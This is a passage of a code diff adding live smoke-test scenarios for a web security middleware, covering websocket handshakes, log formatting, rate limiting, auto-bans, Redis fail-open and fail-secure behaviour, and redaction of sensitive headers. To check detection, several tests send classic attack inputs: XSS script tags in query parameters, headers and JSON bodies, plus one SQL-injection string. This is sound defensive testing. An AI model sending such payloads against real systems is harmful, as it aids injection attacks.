+    return status_code, headers, sock
+
+
+def _recv_exact(sock: socket.socket, count: int) -> bytes:
+    data = b""
+    while len(data) < count:
+        chunk = sock.recv(count - len(data))
+        if not chunk:
+            raise ConnectionError("websocket connection closed before expected data")
+        data += chunk
+    return data
+
+
+def _send_text(sock: socket.socket, message: str) -> None:
+    payload = message.encode("utf-8")
+    mask = os.urandom(4)
+    masked = bytes(byte ^ mask[index % 4] for index, byte in enumerate(payload))
+    sock.sendall(bytes([0x81, 0x80 | len(payload)]) + mask + masked)
+
+
+def _recv_text(sock: socket.socket) -> str:
+    first_two = _recv_exact(sock, 2)
+    length = first_two[1] & 0x7F
+    if length == 126:
+        length = struct.unpack(">H", _recv_exact(sock, 2))[0]
+    elif length == 127:
+        length = struct.unpack(">Q", _recv_exact(sock, 8))[0]
+    return _recv_exact(sock, length).decode("utf-8")
+
+
+@scenario(
+    covers={"suspicious_activity", "enable_penetration_detection"},
+    config={**_BASE_CONFIG, "rate_limit_window": 61},
+)
+def websocket_handshake_with_attack_query_is_rejected_before_accept(
+    ctx: ScenarioContext,
+) -> None:
+    status_code, _, sock = _open_handshake(f"/ws?q={_XSS_QUERY}")
+    assert sock is None
+    assert status_code == 403, status_code
+
+
+@scenario(
+    covers={"blacklist", "ip_security"},
+    config={**_BASE_CONFIG, "blacklist": [CLIENT_IP], "rate_limit_window": 62},
+)
+def websocket_handshake_from_blacklisted_ip_is_rejected_before_accept(
+    ctx: ScenarioContext,
+) -> None:
+    status_code, _, sock = _open_handshake("/ws")
+    assert sock is None
+    assert status_code == 403, status_code
+
+
+@scenario(covers=set(), config={**_BASE_CONFIG, "rate_limit_window": 63})
+def websocket_handshake_accepts_connects_echoes_and_closes_cleanly(
+    ctx: ScenarioContext,
+) -> None:
+    status_code, _, sock = _open_handshake("/ws")
+    assert status_code == 101, status_code
+    assert sock is not None
+    try:
+        _send_text(sock, "smoke-echo")
+        assert _recv_text(sock) == "smoke-echo"
+    finally:
+        sock.close()

--- a/tests/live_smoke/scenarios/log_format_and_muting.py
+++ b/tests/live_smoke/scenarios/log_format_and_muting.py
@@ -1,0 +1,51 @@
+import json
+
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+CUSTOM_LOG_FILE = "/tmp/smoke-custom.log"
+
+CONFIG = {
+    "log_format": "json",
+    "custom_log_file": CUSTOM_LOG_FILE,
+    "muted_check_logs": ["user_agent"],
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+def _assert_muted_check_suppressed_the_line(stdout_lines: list[str]) -> None:
+    assert not any("Blocked user agent: badbot" in line for line in stdout_lines), (
+        "muted_check_logs=['user_agent'] did not suppress the block log line"
+    )
+
+
+def _assert_custom_log_file_has_json_entries(ctx: ScenarioContext) -> list[dict]:
+    file_content = ctx.stack.container_file(CUSTOM_LOG_FILE)
+    entries = [json.loads(line) for line in file_content.splitlines() if line.strip()]
+    assert entries, "custom_log_file produced no entries"
+    for entry in entries:
+        assert set(entry) >= {"timestamp", "level", "logger", "message"}
+    return entries
+
+
+def _assert_json_entries_reflect_the_battery(entries: list[dict]) -> None:
+    assert any("Request from" in entry["message"] for entry in entries)
+    assert not any(
+        "Blocked user agent: badbot" in entry["message"] for entry in entries
+    )
+
+
+@scenario(covers={"log_format", "custom_log_file", "muted_check_logs"}, config=CONFIG)
+def log_format_json_file_and_muted_checks(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    client.get("/basic/ip", params={"q": "hello"})
+    blocked = client.get(
+        "/basic/ip", params={"q": "hello"}, headers={"User-Agent": "badbot"}
+    )
+    assert blocked.status_code == 403
+
+    _assert_muted_check_suppressed_the_line(ctx.stack.logs.lines_since(mark))
+    entries = _assert_custom_log_file_has_json_entries(ctx)
+    _assert_json_entries_reflect_the_battery(entries)

--- a/tests/live_smoke/scenarios/log_levels.py
+++ b/tests/live_smoke/scenarios/log_levels.py
@@ -1,0 +1,28 @@
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+CONFIG = {
+    "log_suspicious_level": "ERROR",
+    "log_request_level": "ERROR",
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+@scenario(covers={"log_suspicious_level", "log_request_level"}, config=CONFIG)
+def suspicious_and_request_log_levels_change_verbosity(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    client.get("/basic/ip", params={"q": "hello"})
+    blocked = client.get(
+        "/basic/ip", params={"q": "hello"}, headers={"User-Agent": "badbot"}
+    )
+    assert blocked.status_code == 403
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("ERROR" in line and "Request from" in line for line in lines), (
+        "log_request_level=ERROR did not raise the request line's level"
+    )
+    assert any(
+        "ERROR" in line and "Suspicious activity detected" in line for line in lines
+    ), "log_suspicious_level=ERROR did not raise the suspicious line's level"

--- a/tests/live_smoke/scenarios/observability.py
+++ b/tests/live_smoke/scenarios/observability.py
@@ -1,0 +1,46 @@
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+OTEL_AND_LOGFIRE_CONFIG = {
+    "enable_otel": True,
+    "otel_service_name": "smoke-otel-service",
+    "otel_exporter_endpoint": "http://otlp-stub:4318",
+    "otel_resource_attributes": {"deployment.environment": "smoke"},
+    "enable_logfire": True,
+    "logfire_service_name": "smoke-logfire-service",
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+def _otlp_requests_seen(ctx: ScenarioContext) -> int | None:
+    response = ctx.otlp.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    count = len(response.json().get("requests", []))
+    return count or None
+
+
+@scenario(
+    covers={"enable_otel", "enable_logfire"},
+    config=OTEL_AND_LOGFIRE_CONFIG,
+)
+def otel_and_logfire_handlers_start_with_extras_installed(
+    ctx: ScenarioContext,
+) -> None:
+    ctx.otlp.post("/_debug/reset")
+    mark = ctx.stack.logs.mark()
+    response = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert response.status_code == 200, (
+        "enabling otel and logfire must not break the request pipeline"
+    )
+
+    log_text = "\n".join(ctx.stack.logs.lines_since(mark))
+    assert "OTEL handler disabled" not in log_text, (
+        "opentelemetry-sdk is installed in the image, the handler must start"
+    )
+    assert "Logfire handler disabled" not in log_text, (
+        "logfire is installed in the image, the handler must start"
+    )
+
+    seen = wait_until(lambda: _otlp_requests_seen(ctx), timeout=30.0)
+    assert seen, "no export reached otlp-stub after enabling otel and logfire"

--- a/tests/live_smoke/scenarios/on_block_and_proxies.py
+++ b/tests/live_smoke/scenarios/on_block_and_proxies.py
@@ -1,0 +1,71 @@
+import ipaddress
+import json
+import re
+
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+ON_BLOCK_LOG = "/tmp/smoke-on-block.jsonl"
+
+CONFIG: dict[str, object] = {
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+_REQUEST_FROM_RE = re.compile(
+    r"Request from (?P<ip>[0-9a-fA-F:.]+): (?P<method>\S+) (?P<url>\S+)"
+)
+
+
+def _assert_client_ip_resolved_through_proxy(match: re.Match[str]) -> None:
+    ip = ipaddress.ip_address(match.group("ip"))
+    assert ip.is_private, (
+        f"client_ip {ip} resolved from nginx's X-Real-IP/X-Forwarded-For is not "
+        "a private/proxy address; trusted_proxies resolution looks wrong"
+    )
+    assert match.group("url").startswith("http://"), (
+        "trust_x_forwarded_proto did not carry nginx's X-Forwarded-Proto into "
+        f"the logged URL: {match.group('url')}"
+    )
+
+
+def _assert_request_lines_show_trusted_proxy_ip(lines: list[str]) -> None:
+    matches = [m for m in (_REQUEST_FROM_RE.search(line) for line in lines) if m]
+    assert matches, "no 'Request from' line was captured"
+    for match in matches:
+        _assert_client_ip_resolved_through_proxy(match)
+
+
+def _assert_on_block_recorded_the_user_agent_block(ctx: ScenarioContext) -> None:
+    on_block_text = ctx.stack.container_file(ON_BLOCK_LOG)
+    entries = [json.loads(line) for line in on_block_text.splitlines() if line.strip()]
+    matching = [
+        entry
+        for entry in entries
+        if entry.get("check_name") == "user_agent" and entry.get("status_code") == 403
+    ]
+    assert matching, f"on_block never recorded a user_agent block; seen: {entries[-5:]}"
+
+
+@scenario(
+    covers={
+        "on_block",
+        "trusted_proxies",
+        "trusted_proxy_depth",
+        "trust_x_forwarded_proto",
+    },
+    config=CONFIG,
+)
+def on_block_and_trusted_proxies(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    clean = client.get("/basic/ip", params={"q": "hello"})
+    assert clean.status_code == 200
+
+    blocked = client.get(
+        "/basic/ip", params={"q": "hello"}, headers={"User-Agent": "badbot"}
+    )
+    assert blocked.status_code == 403
+
+    _assert_request_lines_show_trusted_proxy_ip(ctx.stack.logs.lines_since(mark))
+    _assert_on_block_recorded_the_user_agent_block(ctx)

--- a/tests/live_smoke/scenarios/passive_mode.py
+++ b/tests/live_smoke/scenarios/passive_mode.py
@@ -1,0 +1,24 @@
+from tests.live_smoke.driver import ScenarioContext
+from tests.live_smoke.registry import scenario
+
+CONFIG = {
+    "passive_mode": True,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+
+@scenario(covers={"passive_mode"}, config=CONFIG)
+def passive_mode_flags_without_blocking(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    response = client.get(
+        "/basic/ip",
+        params={"token": "LSPASSIVE<script>alert(1)</script>", "q": "hello"},
+    )
+    assert response.status_code == 200
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any(
+        "[PASSIVE MODE] Penetration attempt detected from" in line for line in lines
+    )

--- a/tests/live_smoke/scenarios/pipeline_plumbing.py
+++ b/tests/live_smoke/scenarios/pipeline_plumbing.py
@@ -1,0 +1,155 @@
+from typing import Any
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+UNRESOLVED_PATH = "/this-path-does-not-exist-smoke"
+BADBOT_HEADERS = {"User-Agent": "badbot"}
+
+RESPONSE_CUSTOMIZATION_CONFIG = {
+    "custom_error_responses": {"403": "SMOKE_CUSTOM_403_BODY"},
+    "route_resolution_strict": True,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _assert_route_resolution_strict(ctx: ScenarioContext, mark: str) -> None:
+    unresolved = ctx.client.get(UNRESOLVED_PATH)
+    assert unresolved.status_code == 500, (
+        "route_resolution_strict=True should turn an unroutable path into a 500, "
+        f"got {unresolved.status_code}"
+    )
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("Route resolution failed" in line for line in lines)
+
+
+def _assert_resolved_route_and_response_modifier(ctx: ScenarioContext) -> None:
+    resolved = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert resolved.status_code == 200, (
+        "route_resolution_strict=True must not affect an already-resolved route"
+    )
+    assert resolved.headers.get("X-Content-Type-Options") == "nosniff", (
+        "custom_response_modifier should stamp X-Content-Type-Options, which "
+        "the base security_headers config never sets on its own"
+    )
+
+
+def _assert_custom_request_check(ctx: ScenarioContext) -> None:
+    debug_blocked = ctx.client.get("/basic/ip", params={"q": "hello", "debug": "true"})
+    assert debug_blocked.status_code == 403
+    assert debug_blocked.json()["detail"] == "Debug mode not allowed", (
+        "custom_request_check should intercept ?debug=true before the handler runs"
+    )
+
+
+def _assert_custom_error_response(ctx: ScenarioContext) -> None:
+    badbot_blocked = ctx.client.get(
+        "/basic/ip", params={"q": "hello"}, headers=BADBOT_HEADERS
+    )
+    assert badbot_blocked.status_code == 403
+    assert badbot_blocked.text == "SMOKE_CUSTOM_403_BODY", (
+        "custom_error_responses[403] should replace the default block message"
+    )
+
+
+def _assert_excluded_paths_skip_user_agent_check(ctx: ScenarioContext) -> None:
+    health_with_badbot = ctx.client.get("/health", headers=BADBOT_HEADERS)
+    assert health_with_badbot.status_code == 200, (
+        "exclude_paths should keep /health out of the user_agent check"
+    )
+
+    docs_with_badbot = ctx.client.get("/docs", headers=BADBOT_HEADERS)
+    assert docs_with_badbot.status_code == 200, (
+        "exclude_paths should keep /docs out of the user_agent check"
+    )
+
+
+@scenario(
+    covers={
+        "custom_error_responses",
+        "custom_request_check",
+        "custom_response_modifier",
+        "route_resolution_strict",
+        "exclude_paths",
+    },
+    config=RESPONSE_CUSTOMIZATION_CONFIG,
+)
+def pipeline_response_customization_and_route_resolution(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+
+    _assert_route_resolution_strict(ctx, mark)
+    _assert_resolved_route_and_response_modifier(ctx)
+    _assert_custom_request_check(ctx)
+    _assert_custom_error_response(ctx)
+    _assert_excluded_paths_skip_user_agent_check(ctx)
+
+
+BYPASS_CONFIG = {
+    "rate_limit": 3,
+    "rate_limit_window": 60,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"bypass"}, config=BYPASS_CONFIG)
+def bypass_decorator_skips_rate_limit_on_its_route(ctx: ScenarioContext) -> None:
+    bypass_statuses = [
+        ctx.client.get("/access/bypass-demo").status_code for _ in range(6)
+    ]
+    assert all(status == 200 for status in bypass_statuses), (
+        "@guard.bypass(['rate_limit', 'ip']) should never hit the global "
+        f"rate_limit=3/60s; statuses={bypass_statuses}"
+    )
+
+    limited_statuses = [
+        ctx.client.get("/basic/ip", params={"q": "hello"}).status_code for _ in range(6)
+    ]
+    assert 429 in limited_statuses, (
+        "a non-bypassed route should hit the global rate_limit=3/60s; "
+        f"statuses={limited_statuses}"
+    )
+
+
+AGENT_WIRING_CONFIG = {
+    "enable_agent": True,
+    "agent_api_key": "smoke-agent-key",
+    "agent_endpoint": "http://agent-stub:8090",
+    "agent_flush_interval": 2,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _state_with_behavioral_violation(ctx: ScenarioContext) -> dict[str, Any] | None:
+    response = ctx.agent.get("/_debug/state")
+    if response.status_code != 200:
+        return None
+    state: dict[str, Any] = response.json()
+    matches = any(
+        event.get("event_type") == "behavioral_violation"
+        for event in state.get("events", [])
+    )
+    return state if matches else None
+
+
+def _fire_usage_monitor_burst(ctx: ScenarioContext) -> None:
+    for _ in range(11):
+        ctx.client.get("/behavior/usage-monitor")
+
+
+@scenario(covers={"initialize_agent"}, config=AGENT_WIRING_CONFIG)
+def decorator_agent_wiring_via_behavior_tracker(ctx: ScenarioContext) -> None:
+    ctx.agent.post("/_debug/reset")
+    _fire_usage_monitor_burst(ctx)
+
+    state = wait_until(lambda: _state_with_behavioral_violation(ctx), timeout=15.0)
+    if state is None:
+        _fire_usage_monitor_burst(ctx)
+        state = wait_until(lambda: _state_with_behavioral_violation(ctx), timeout=30.0)
+
+    assert state is not None, (
+        "SecurityDecorator.initialize_agent must wire behavior_tracker.agent_handler "
+        "so a crossed usage_monitor threshold reaches the agent stub"
+    )

--- a/tests/live_smoke/scenarios/rate_limit_and_bans.py
+++ b/tests/live_smoke/scenarios/rate_limit_and_bans.py
@@ -1,0 +1,231 @@
+import os
+
+import httpx
+
+from tests.live_smoke.driver import STACK_DIR, ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+CLIENT_IP = "192.168.50.50"
+
+_TYPE_STRING = 2
+_TYPE_UINT16 = 5
+_TYPE_UINT32 = 6
+_TYPE_MAP = 7
+_TYPE_UINT64 = 9
+_TYPE_ARRAY = 11
+_NODE = "node"
+_DATA = "data"
+
+
+def _mmdb_control_byte(data_type: int, size: int) -> bytes:
+    if data_type <= 7:
+        return bytes([(data_type << 5) | size])
+    return bytes([size, data_type - 7])
+
+
+def _mmdb_encode_string(value: str) -> bytes:
+    payload = value.encode("utf-8")
+    return _mmdb_control_byte(_TYPE_STRING, len(payload)) + payload
+
+
+def _mmdb_encode_uint(data_type: int, value: int, byte_len: int) -> bytes:
+    raw = value.to_bytes(byte_len, "big").lstrip(b"\x00")
+    return _mmdb_control_byte(data_type, len(raw)) + raw
+
+
+def _mmdb_country_record(country: str) -> bytes:
+    key = _mmdb_encode_string("country")
+    value = _mmdb_encode_string(country)
+    return _mmdb_control_byte(_TYPE_MAP, 1) + key + value
+
+
+def _mmdb_metadata(node_count: int) -> bytes:
+    entries: dict[str, bytes] = {
+        "node_count": _mmdb_encode_uint(_TYPE_UINT32, node_count, 4),
+        "record_size": _mmdb_encode_uint(_TYPE_UINT16, 24, 2),
+        "ip_version": _mmdb_encode_uint(_TYPE_UINT16, 4, 2),
+        "database_type": _mmdb_encode_string("guard-core-live-smoke"),
+        "languages": _mmdb_control_byte(_TYPE_ARRAY, 1) + _mmdb_encode_string("en"),
+        "binary_format_major_version": _mmdb_encode_uint(_TYPE_UINT16, 2, 2),
+        "binary_format_minor_version": _mmdb_encode_uint(_TYPE_UINT16, 0, 2),
+        "build_epoch": _mmdb_encode_uint(_TYPE_UINT64, 1_700_000_000, 8),
+        "description": (
+            _mmdb_control_byte(_TYPE_MAP, 1)
+            + _mmdb_encode_string("en")
+            + _mmdb_encode_string("guard-core-live-smoke")
+        ),
+    }
+    body = _mmdb_control_byte(_TYPE_MAP, len(entries))
+    for key, encoded_value in entries.items():
+        body += _mmdb_encode_string(key) + encoded_value
+    return body
+
+
+def _build_single_entry_mmdb(ip: str, country: str) -> bytes:
+    octets = [int(part) for part in ip.split(".")]
+    bits = "".join(f"{octet:08b}" for octet in octets)
+
+    nodes: list[list[tuple[str, int] | None]] = [[None, None]]
+    node_idx = 0
+    for position, bit in enumerate(bits):
+        branch = int(bit)
+        if position == len(bits) - 1:
+            nodes[node_idx][branch] = (_DATA, 0)
+        else:
+            nodes.append([None, None])
+            child_idx = len(nodes) - 1
+            nodes[node_idx][branch] = (_NODE, child_idx)
+            node_idx = child_idx
+
+    node_count = len(nodes)
+    data_section = _mmdb_country_record(country)
+
+    def resolve(value: tuple[str, int] | None) -> int:
+        if value is None:
+            return node_count
+        kind, payload = value
+        if kind == _NODE:
+            return payload
+        return node_count + 16
+
+    tree = bytearray()
+    for left, right in nodes:
+        tree += resolve(left).to_bytes(3, "big")
+        tree += resolve(right).to_bytes(3, "big")
+
+    return (
+        bytes(tree)
+        + b"\x00" * 16
+        + data_section
+        + b"\xab\xcd\xefMaxMind.com"
+        + _mmdb_metadata(node_count)
+    )
+
+
+_GEO_CN_HOST_PATH = STACK_DIR / "scenario_data" / "rate_limit_geo_cn.mmdb"
+GEO_CN_CONTAINER_PATH = "/smoke/rate_limit_geo_cn.mmdb"
+
+if os.environ.get("LIVE_SMOKE") == "1":
+    _GEO_CN_HOST_PATH.parent.mkdir(parents=True, exist_ok=True)
+    _GEO_CN_HOST_PATH.write_bytes(_build_single_entry_mmdb(CLIENT_IP, "CN"))
+
+GLOBAL_RATE_LIMIT_CONFIG = {
+    "rate_limit": 3,
+    "rate_limit_window": 60,
+    "enable_rate_limiting": True,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"rate_limit", "rate_limit_window", "enable_rate_limiting"},
+    config=GLOBAL_RATE_LIMIT_CONFIG,
+)
+def global_rate_limit_blocks_after_the_configured_request_count(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+    statuses = [client.get("/basic/health").status_code for _ in range(4)]
+    assert statuses[:3] == [200, 200, 200], statuses
+    assert statuses[3] == 429, statuses
+
+
+ENDPOINT_RATE_LIMIT_CONFIG = {
+    "endpoint_rate_limits": {"/basic/health": [2, 60]},
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"endpoint_rate_limits"}, config=ENDPOINT_RATE_LIMIT_CONFIG)
+def endpoint_rate_limits_override_the_global_limit_per_path(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+    statuses = [client.get("/basic/health").status_code for _ in range(3)]
+    assert statuses[:2] == [200, 200], statuses
+    assert statuses[2] == 429, statuses
+
+
+GEO_RATE_LIMIT_CONFIG = {
+    "blocked_countries": ["ZZ"],
+    "ipinfo_token": "smoke-token",
+    "ipinfo_db_path": GEO_CN_CONTAINER_PATH,
+    "rate_limit": 10000,
+    "rate_limit_window": 60,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"geo_rate_limit"}, config=GEO_RATE_LIMIT_CONFIG)
+def geo_rate_limit_applies_the_resolved_countrys_bucket(ctx: ScenarioContext) -> None:
+    client = ctx.client
+    statuses = [client.get("/rate/geo-rate-limit").status_code for _ in range(11)]
+    assert all(status == 200 for status in statuses[:10]), statuses
+    assert statuses[10] == 429, statuses
+
+
+AUTO_BAN_CONFIG = {
+    "auto_ban_threshold": 2,
+    "auto_ban_duration": 6,
+    "enable_ip_banning": True,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+def _is_not_banned(client: httpx.Client) -> bool:
+    return client.get("/basic/ip", params={"q": "hello"}).status_code != 403
+
+
+@scenario(
+    covers={"auto_ban_threshold", "auto_ban_duration", "enable_ip_banning"},
+    config=AUTO_BAN_CONFIG,
+)
+def auto_ban_threshold_and_duration_govern_penetration_bans(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+    xss_params = {"q": "<script>alert(1)</script>"}
+
+    first = client.get("/basic/ip", params=xss_params)
+    assert first.status_code == 400
+
+    second = client.get("/basic/ip", params=xss_params)
+    assert second.status_code == 403
+
+    third = client.get("/basic/ip", params={"q": "hello"})
+    assert third.status_code == 403
+
+    assert wait_until(lambda: _is_not_banned(client), timeout=15.0, interval=1.0), (
+        "IP stayed banned past auto_ban_duration"
+    )
+
+
+RATE_LIMIT_AUTOBAN_CONFIG = {
+    "enable_rate_limiting": True,
+    "rate_limit": 1,
+    "rate_limit_window": 60,
+    "enable_ip_banning": True,
+    "enable_rate_limit_auto_ban": True,
+    "threat_ban_config": {"rate_limit": {"threshold": 2, "duration": 8}},
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"enable_rate_limit_auto_ban", "threat_ban_config"},
+    config=RATE_LIMIT_AUTOBAN_CONFIG,
+)
+def rate_limit_auto_ban_uses_the_configured_threat_ban_thresholds(
+    ctx: ScenarioContext,
+) -> None:
+    client = ctx.client
+    mark = ctx.stack.logs.mark()
+
+    statuses = [client.get("/basic/health").status_code for _ in range(6)]
+
+    assert 429 in statuses, statuses
+    assert 403 in statuses, statuses
+
+    lines = ctx.stack.logs.lines_since(mark)
+    assert any("IP banned due to rate_limit threshold" in line for line in lines)

--- a/tests/live_smoke/scenarios/redis_and_resilience.py
+++ b/tests/live_smoke/scenarios/redis_and_resilience.py
@@ -1,0 +1,148 @@
+import subprocess
+import time
+from collections.abc import Iterator
+from contextlib import contextmanager
+
+from tests.live_smoke.driver import PROJECT, STACK_DIR, ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+REDIS_SERVICE = "redis"
+EXCLUDED_HEADERS = ["x-real-ip", "x-forwarded-for"]
+
+
+def _compose_signal(action: str) -> None:
+    subprocess.run(
+        [
+            "docker",
+            "compose",
+            "-p",
+            PROJECT,
+            "-f",
+            str(STACK_DIR / "compose.yml"),
+            action,
+            REDIS_SERVICE,
+        ],
+        cwd=STACK_DIR,
+        capture_output=True,
+        text=True,
+        check=True,
+    )
+
+
+@contextmanager
+def _redis_paused() -> Iterator[None]:
+    _compose_signal("pause")
+    try:
+        yield
+    finally:
+        _compose_signal("unpause")
+
+
+POOL_TUNING_CONFIG = {
+    "enable_redis": True,
+    "redis_prefix": "smoke_pool_test:",
+    "redis_max_connections": 5,
+    "redis_retries": 2,
+    "redis_health_check_interval": 10,
+    "lazy_init": True,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={
+        "enable_redis",
+        "redis_prefix",
+        "redis_max_connections",
+        "redis_retries",
+        "redis_health_check_interval",
+        "lazy_init",
+    },
+    config=POOL_TUNING_CONFIG,
+)
+def redis_prefix_and_pool_tuning_survive_normal_operation(
+    ctx: ScenarioContext,
+) -> None:
+    basic = ctx.client.get("/basic/ip", params={"q": "hello"})
+    assert basic.status_code == 200
+
+    keys = wait_until(lambda: ctx.redis.keys("smoke_pool_test:*") or None, timeout=10.0)
+    assert keys, "redis_prefix should namespace at least one written Redis key"
+
+
+FAIL_SECURE_CONFIG = {
+    "fail_secure": True,
+    "redis_fail_open": False,
+    "redis_socket_timeout": 1.0,
+    "redis_socket_connect_timeout": 1.0,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(
+    covers={"fail_secure", "redis_socket_timeout", "redis_socket_connect_timeout"},
+    config=FAIL_SECURE_CONFIG,
+)
+def redis_fail_secure_blocks_when_redis_is_paused(ctx: ScenarioContext) -> None:
+    mark = ctx.stack.logs.mark()
+
+    with _redis_paused():
+        start = time.monotonic()
+        response = ctx.client.get("/basic/ip", params={"q": "hello"})
+        elapsed = time.monotonic() - start
+
+        assert response.status_code == 500, (
+            "fail_secure=True with redis_fail_open=False must block the request "
+            f"when Redis is unreachable; got {response.status_code}"
+        )
+        assert elapsed < 8.0, (
+            "redis_socket_timeout=1.0/redis_socket_connect_timeout=1.0 should "
+            f"bound the failure detection; observed {elapsed:.2f}s"
+        )
+
+    log_text = "\n".join(ctx.stack.logs.lines_since(mark))
+    assert "Blocking request due to check error in fail-secure mode" in log_text
+
+    recovered = wait_until(
+        lambda: ctx.client.get("/basic/ip", params={"q": "hello"}).status_code == 200,
+        timeout=15.0,
+    )
+    assert recovered, "the app never recovered after Redis was unpaused"
+
+
+FAIL_OPEN_CONFIG = {
+    "redis_fail_open": True,
+    "redis_socket_timeout": 1.0,
+    "redis_socket_connect_timeout": 1.0,
+    "excluded_detection_headers": EXCLUDED_HEADERS,
+}
+
+
+@scenario(covers={"redis_fail_open"}, config=FAIL_OPEN_CONFIG)
+def redis_fail_open_passes_through_when_redis_is_paused(
+    ctx: ScenarioContext,
+) -> None:
+    mark = ctx.stack.logs.mark()
+
+    with _redis_paused():
+        start = time.monotonic()
+        response = ctx.client.get("/basic/ip", params={"q": "hello"})
+        elapsed = time.monotonic() - start
+
+        assert response.status_code == 200, (
+            "redis_fail_open=True must let the request through when Redis is "
+            f"unreachable; got {response.status_code}"
+        )
+        assert elapsed < 8.0, (
+            "redis_socket_timeout=1.0/redis_socket_connect_timeout=1.0 should "
+            f"bound the failure detection; observed {elapsed:.2f}s"
+        )
+
+    log_text = "\n".join(ctx.stack.logs.lines_since(mark))
+    assert "redis_fail_open=True" in log_text
+
+    recovered = wait_until(
+        lambda: ctx.client.get("/basic/ip", params={"q": "hello"}).status_code == 200,
+        timeout=15.0,
+    )
+    assert recovered, "the app never recovered after Redis was unpaused"

--- a/tests/live_smoke/scenarios/sensitive_data.py
+++ b/tests/live_smoke/scenarios/sensitive_data.py
@@ -1,0 +1,161 @@
+import json
+from typing import Any
+
+import httpx
+
+from tests.live_smoke.driver import ScenarioContext, wait_until
+from tests.live_smoke.registry import scenario
+
+CONFIG = {
+    "log_sensitive_headers": ["x-internal-token"],
+    "log_sensitive_params": ["sig"],
+    "log_sensitive_body_fields": ["ssn"],
+    "enable_agent": True,
+    "agent_api_key": "smoke-agent-key",
+    "agent_endpoint": "http://agent-stub:8090",
+    "agent_flush_interval": 2,
+    "excluded_detection_headers": ["x-real-ip", "x-forwarded-for"],
+}
+
+_BASE_HEADERS = {
+    "Authorization": "Bearer LS-BEARER",
+    "Cookie": "sid=LS-COOKIE",
+    "X-API-Key": "LS-APIKEY",
+    "Proxy-Authorization": "Basic LS-PROXYAUTH",
+    "X-Internal-Token": "LS-INTERNAL",
+}
+
+_RAW_SECRETS = [
+    "LS-BEARER",
+    "LS-COOKIE",
+    "LS-APIKEY",
+    "LS-PROXYAUTH",
+    "LS-INTERNAL",
+    "LS-SIG",
+    "LS-SSN-TOP",
+    "LS-SSN-NESTED",
+    "LS-SSN-FORM",
+]
+_MUST_STILL_SHOW = ["q=hello", "alert(1)"]
+_MUST_APPEAR_ONCE = [
+    "Request from",
+    "Suspicious pattern in header 'x-internal-token'",
+    "Suspicious pattern in query param 'sig'",
+    "Suspicious pattern in ssn",
+    "Suspicious pattern in note",
+    "Rate limit exceeded for IP:",
+    "Banned IP attempted access",
+]
+
+
+def _run_battery(client: httpx.Client) -> httpx.Response:
+    client.get(
+        "/basic/ip", params={"sig": "LS-SIG", "q": "hello"}, headers=_BASE_HEADERS
+    )
+
+    client.get("/rate/strict-limit", headers=_BASE_HEADERS)
+    rate_limited = client.get("/rate/strict-limit", headers=_BASE_HEADERS)
+    assert rate_limited.status_code == 429
+
+    header_xss = dict(_BASE_HEADERS)
+    header_xss["X-Internal-Token"] = "LS-INTERNAL-XSS<script>alert(1)</script>"
+    client.get("/basic/ip", params={"sig": "LS-SIG", "q": "hello"}, headers=header_xss)
+
+    query_xss_params = {"sig": "LS-SIGXSS<script>alert(1)</script>", "q": "hello"}
+    client.get("/basic/ip", params=query_xss_params, headers=_BASE_HEADERS)
+
+    client.post(
+        "/basic/echo",
+        params={"sig": "LS-SIG", "q": "hello"},
+        headers=_BASE_HEADERS,
+        json={
+            "ssn": "LS-SSN-TOP<script>alert(1)</script>",
+            "account": {"ssn": "LS-SSN-NESTED<script>alert(1)</script>"},
+        },
+    )
+
+    client.post(
+        "/basic/echo",
+        params={"sig": "LS-SIG", "q": "hello"},
+        headers={**_BASE_HEADERS, "Content-Type": "application/x-www-form-urlencoded"},
+        content="ssn=LS-SSN-FORM' OR 1=1--",
+    )
+
+    client.post(
